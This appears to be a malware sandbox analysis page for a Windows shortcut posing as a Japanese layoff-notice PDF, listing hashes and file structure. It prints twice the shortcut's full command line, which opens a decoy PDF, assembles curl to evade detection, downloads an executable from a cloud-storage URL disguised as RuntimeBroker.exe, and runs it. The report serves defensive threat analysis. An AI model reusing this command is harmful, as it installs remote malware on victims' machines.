Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
585da0337e9d9a9c1d5bf097bdf8c1f1
Sha1
16643b92b6012fd58f6c8fa38741435e7c6fe43c
Sha256
80b875df61fac83d0ff878b6dce5ce67db88c397522e6f6a7ccae5bf882eef0d
Sha384
27cb5f000543fdac5866798e26197f5a10eaed956fbedf737ba9608a3954080b889ca8165de466f1ed2aadaaba6d69c1
Sha512
5ba0e05502681db9f1bf95833e88b9b366dc328cec03b9513325772924d059e0023c472a838f23dcf6e5fd4459d7a3f56c34556bf98d6678cfa4785356c7a548
SSDeep
3072:xJIYJ7JESQJyEAlShBoeDnCVfJUoCBFc4prz1MaZ2Z1Frfh+3pVMwmw:xuUJESjEO6Boej2f7CCQopszMwmw
TLSH
8A0423DA50D1CAB4C1A1B92A0C3A4F95BA52F70D05C2DEFF31B42D52E2CABD505FB189
File Structure
585da0337e9d9a9c1d5bf097bdf8c1f1
Malicious
¥ê¥¹¥È¥é֪ͨ•ø.pdf.lnk
Malicious
PDF @0x0000041B
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /c md %TEMP%\vzvqljeo 2>nul&powershell -nop -w 1 -c "$n='リストラ通知書..pdf.lnk';$ds=@((gl).Path,[Environment]::GetFolderPath('Desktop'),(Join-Path $env:USERPROFILE 'Downloads'),$env:USERPROFILE,(Join-Path $env:USERPROFILE 'Documents'));$f=$null;$ds|%{$t=Join-Path $_ $n;if(!$f-and(Test-Path $t)){$f=$t}};if(!$f){gci $env:TEMP -r -fi $n -ea 0|select -f 1|%{$f=$_.FullName}};if($f){$b=[IO.File]::ReadAllBytes($f);$o=Join-Path '%TEMP%\vzvqljeo' 'リストラ通知書..pdf';[IO.File]::WriteAllBytes($o,[byte[]]$b[4433..196053]);saps $o}"&set el=cu&set iz=rl.exe&call %el%%iz% -s -o %TEMP%\vzvqljeo\RuntimeBroker.exe https://storage.googleapis.com/opentokenaiit/newgram.exe&start /b %TEMP%\vzvqljeo\RuntimeBroker.exe
585da0337e9d9a9c1d5bf097bdf8c1f1 (187.64 KB)
File Structure
585da0337e9d9a9c1d5bf097bdf8c1f1
Malicious
¥ê¥¹¥È¥é֪ͨ•ø.pdf.lnk
Malicious
PDF @0x0000041B
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

cmd.exe /c md %TEMP%\vzvqljeo 2>nul&powershell -nop -w 1 -c "$n='リストラ通知書..pdf.lnk';$ds=@((gl).Path,[Environment]::GetFolderPath('Desktop'),(Join-Path $env:USERPROFILE 'Downloads'),$env:USERPROFILE,(Join-Path $env:USERPROFILE 'Documents'));$f=$null;$ds|%{$t=Join-Path $_ $n;if(!$f-and(Test-Path $t)){$f=$t}};if(!$f){gci $env:TEMP -r -fi $n -ea 0|select -f 1|%{$f=$_.FullName}};if($f){$b=[IO.File]::ReadAllBytes($f);$o=Join-Path '%TEMP%\vzvqljeo' 'リストラ通知書..pdf';[IO.File]::WriteAllBytes($o,[byte[]]$b[4433..196053]);saps $o}"&set el=cu&set iz=rl.exe&call %el%%iz% -s -o %TEMP%\vzvqljeo\RuntimeBroker.exe https://storage.googleapis.com/opentokenaiit/newgram.exe&start /b %TEMP%\vzvqljeo\RuntimeBroker.exe

Malicious

585da0337e9d9a9c1d5bf097bdf8c1f1 > ¥ê¥¹¥È¥é֪ͨ•ø.pdf.lnk
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙